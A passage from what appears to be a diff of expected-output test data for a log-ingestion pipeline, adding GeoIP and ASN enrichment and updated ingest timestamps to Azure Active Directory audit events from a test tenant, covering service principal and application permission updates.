t.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"5345f95e-44e0-48fc-823c-8206ff821338\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla
/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:52.6473040Z\"},{\"Name\":\"env_epoch\",\"Value\":\"FQXLK\"},{\"Name\":\"env_seqNum\",\"Value\":\"42492835\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##957dae7d-5f0a-4e82-a428-61c0dba2878b_00000000-0000-0000-0000-000000000000_957dae7d-5f0a-4e82-a428-61c0dba2878b\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR565\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"76f9b173-c35c-4dbb-b5f7-64750ae994ce\",\"ModifiedProperties\":[{\"Name\":\"Included Updated Properties\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"}],\"ObjectId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Operation\":\"Update service 
principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":2},{\"ID\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -3906,6 +4158,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -4050,7 +4314,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124955100Z", + "ingested": "2021-12-14T14:48:43.176649274Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -4077,6 +4341,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -4221,7 +4497,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124961200Z", + "ingested": "2021-12-14T14:48:43.176649997Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -4248,6 +4524,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -4392,7 +4680,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124967100Z", + "ingested": "2021-12-14T14:48:43.176650792Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"08d8bb01-c269-4a92-9929-a1a89b729512\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"51e48c97-80b1-42bb-b732-8b578dfac528\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 
Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T18:25:54.7174137Z\"},{\"Name\":\"env_epoch\",\"Value\":\"73AB6\"},{\"Name\":\"env_seqNum\",\"Value\":\"43793182\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##a3a48e48-9c2c-4655-9862-13069eb7726c_00000000-0000-0000-0000-000000000000_a3a48e48-9c2c-4655-9862-13069eb7726c\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR575\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"d6ad8dba-dd88-499e-a1e1-e649bf8eeb71\",\"ModifiedProperties\":[{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": 
[\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"594c1fb6-4f81-4475-ae41-0c394909246c\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"4807a72c-ad38-4250-94c9-4eabfe26cd55\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n },\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n },\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"c5393580-f805-4401-95e8-94b7a6ef2fc2\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e2cea78f-e743-4d8f-a16a-75b629a038ae\\\",\\r\\n \\\"DirectAccessGrant\\\": true,\\r\\n \\\"ImpersonationAccessGrants\\\": []\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Update 
application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"08d8bb01-c269-4a92-9929-a1a89b729512\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -4419,6 +4707,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -4572,7 +4872,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.124973800Z", + "ingested": "2021-12-14T14:48:43.176651494Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T18:25:54\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6